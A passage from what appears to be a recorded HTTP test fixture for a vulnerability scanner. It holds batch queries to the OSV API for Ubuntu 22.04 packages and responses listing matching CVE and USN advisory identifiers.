{ "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsepol" }, "version": "3.3-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "openssl" }, "version": "3.0.2-0ubuntu1.18" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtasn1-6" }, "version": "4.18.0-4build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libunistring" }, "version": "1.0-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xxhash" }, "version": "0.8.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libzstd" }, "version": "1.4.8+dfsg-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lsb" }, "version": "11.1.0ubuntu4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "mawk" }, "version": "1.3.4.20200120-3" }, { "package": { "ecosystem": "Ubuntu:22.04", 
"name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "perl" }, "version": "5.34.0-3ubuntu1.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sed" }, "version": "4.8-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sensible-utils" }, "version": "0.0.17" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sysvinit" }, "version": "3.01-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "tar" }, "version": "1.34+dfsg-1ubuntu0.1.22.04.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ubuntu-keyring" }, "version": "2021.03.26" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "usrmerge" }, "version": "25ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "zlib" }, "version": "1:1.2.11.dfsg-2ubuntu9.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/scanning_ubuntu_image url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 11965 body: | { "results": [ {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-2781", "modified": "2026-03-18T06:32:17.714169Z" }, { "id": "UBUNTU-CVE-2025-5278", "modified": "2026-03-18T07:55:13.290684Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-6297", "modified": "2026-02-04T03:36:18.990840Z" }, { "id": "UBUNTU-CVE-2026-2219", "modified": "2026-03-14T09:17:58.405826Z" }, { "id": "USN-7768-1", 
"modified": "2026-02-10T04:49:49Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-3219", "modified": "2026-01-20T17:26:42.776809Z" }, { "id": "UBUNTU-CVE-2025-30258", "modified": "2026-02-04T04:30:17.426918Z" }, { "id": "UBUNTU-CVE-2025-68972", "modified": "2026-01-20T19:15:15.770361Z" }, { "id": "UBUNTU-CVE-2025-68973", "modified": "2026-02-05T00:30:28.335358Z" }, { "id": "USN-7412-1", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7412-2", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7946-1", "modified": "2026-02-10T04:50:47Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", 
"modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-1390", "modified": "2026-02-04T04:28:50.933288Z" }, { "id": "USN-7287-1", "modified": "2026-02-10T04:47:15Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-2236", "modified": "2026-01-20T17:51:42.649938Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-12243", "modified": "2026-02-04T02:53:36.843010Z" }, { "id": "UBUNTU-CVE-2025-14831", "modified": "2026-02-28T05:58:56.935176Z" }, { "id": "UBUNTU-CVE-2025-32988", "modified": "2026-02-04T02:15:37.273955Z" }, { "id": "UBUNTU-CVE-2025-32989", "modified": "2026-02-04T03:37:18.739300Z" }, { "id": "UBUNTU-CVE-2025-32990", "modified": "2026-02-04T03:31:01.615385Z" }, { "id": "UBUNTU-CVE-2025-6395", "modified": "2026-02-04T03:31:22.603031Z" }, { "id": "UBUNTU-CVE-2025-9820", "modified": "2026-02-28T06:16:45.816014Z" }, { "id": "USN-7281-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7635-1", "modified": "2026-02-10T04:49:34Z" }, { "id": "USN-8043-1", "modified": "2026-02-17T22:00:37.652199Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": 
"2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": 
"2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2025-62813", "modified": "2025-10-27T08:32:45.494712Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": 
"2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-41409", "modified": "2025-10-24T04:53:52Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-13176", "modified": "2026-03-09T11:29:11.736076Z" }, { "id": "UBUNTU-CVE-2024-41996", "modified": "2026-02-06T21:00:29.439853Z" }, { "id": "UBUNTU-CVE-2024-9143", "modified": "2026-03-09T11:29:50.088989Z" }, { "id": "UBUNTU-CVE-2025-15467", "modified": "2026-03-05T18:42:43.606385Z" }, { "id": "UBUNTU-CVE-2025-27587", "modified": "2026-02-06T21:55:03.879396Z" }, { "id": "UBUNTU-CVE-2025-68160", "modified": "2026-02-12T06:59:44.011039Z" }, { "id": "UBUNTU-CVE-2025-69418", "modified": "2026-02-06T22:01:44.179826Z" }, { "id": "UBUNTU-CVE-2025-69419", "modified": "2026-02-12T06:59:40.921557Z" }, { "id": "UBUNTU-CVE-2025-69420", "modified": "2026-02-12T06:58:38.833674Z" }, { "id": "UBUNTU-CVE-2025-69421", "modified": "2026-03-02T12:02:19.670699Z" }, { "id": "UBUNTU-CVE-2025-9230", "modified": "2026-03-09T12:25:45.048270Z" }, { "id": "UBUNTU-CVE-2026-22795", "modified": "2026-02-12T06:58:35.942634Z" }, { "id": "UBUNTU-CVE-2026-22796", "modified": "2026-02-12T06:59:02.005868Z" }, { "id": "UBUNTU-CVE-2026-2673", "modified": "2026-03-18T08:04:38.900604Z" }, { "id": "USN-7278-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7786-1", "modified": "2026-02-10T04:50:09Z" }, { "id": "USN-7980-1", "modified": "2026-03-02T11:56:15.392710Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": 
"2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2021-46848", "modified": "2026-02-12T06:44:04.921097Z" }, { "id": "UBUNTU-CVE-2024-12133", "modified": "2026-02-12T06:31:24.332995Z" }, { "id": "UBUNTU-CVE-2025-13151", "modified": "2026-02-12T06:43:59.770392Z" }, { "id": "USN-7275-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7954-1", "modified": "2026-02-10T04:50:47Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-4899", "modified": "2025-09-08T16:49:53Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": 
"2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-31486", "modified": "2025-10-24T05:01:58Z" }, { "id": "UBUNTU-CVE-2023-47039", "modified": "2025-10-24T05:02:19Z" }, { "id": "UBUNTU-CVE-2024-56406", "modified": "2026-02-04T02:50:55.689079Z" }, { "id": "UBUNTU-CVE-2025-40909", "modified": "2026-02-04T02:15:05.324531Z" }, { "id": "USN-7434-1", "modified": "2026-02-10T04:47:48Z" }, { "id": "USN-7678-1", "modified": "2026-02-10T04:49:41Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-45582", "modified": "2026-01-20T18:59:29.811906Z" } ] }, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2026-27171", "modified": "2026-02-27T09:59:13Z" } ] } ] } headers: Content-Length: - "11965" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14321 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:22.04", "name": "adduser" }, "version": "3.118ubuntu5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-files" }, "version": "12ubuntu4.7" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-passwd" }, "version": "3.5.52build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bash" }, "version": "5.1-6ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "1:2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "coreutils" }, "version": "8.32-4.1ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dash" }, "version": "0.5.11+git20210903+057cd650a4ed-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": 
"debconf" }, "version": "1.5.79ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debianutils" }, "version": "5.5-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "diffutils" }, "version": "1:3.8-0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dpkg" }, "version": "1.21.1ubuntu2.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "findutils" }, "version": "4.8.0-1ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "fzf" }, "version": "0.29.0-1ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.18.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnupg2" }, "version": "2.2.27-3ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "grep" }, "version": "3.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gzip" }, "version": "1.10-4ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "hostname" }, "version": "3.23ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "init-system-helpers" }, "version": "1.62" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "acl" }, "version": "2.3.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "attr" }, "version": "1:2.5.1-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bzip2" }, "version": "1.0.8-5build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, 
"version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap-ng" }, "version": "0.7.9-2.2build3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap2" }, "version": "1:2.44-1ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libxcrypt" }, "version": "1:4.4.27-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.8ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "cdebconf" }, "version": "0.261ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libffi" }, "version": "3.4.2-4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgcrypt20" }, "version": "1.9.4-3ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gmp" }, "version": "2:6.2.1+dfsg-3ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnutls28" }, "version": "3.7.3-4ubuntu1.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgpg-error" }, "version": "1.43-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libidn2" }, "version": "2.3.2-2build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "keyutils" }, "version": "1.6.1-2ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { 
"ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lz4" }, "version": "1.9.3-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xz-utils" }, "version": "5.2.5-2ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libnsl" }, "version": "1.3.0-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "p11-kit" }, "version": "0.24.0-6build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre2" }, "version": "10.39-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre3" }, "version": "2:8.39-13ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libseccomp" }, "version": "2.5.3-2ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libselinux" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsepol" }, "version": 
"3.3-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "openssl" }, "version": "3.0.2-0ubuntu1.18" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtasn1-6" }, "version": "4.18.0-4build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libunistring" }, "version": "1.0-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xxhash" }, "version": "0.8.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libzstd" }, "version": "1.4.8+dfsg-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lsb" }, "version": "11.1.0ubuntu4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "mawk" }, "version": "1.3.4.20200120-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": 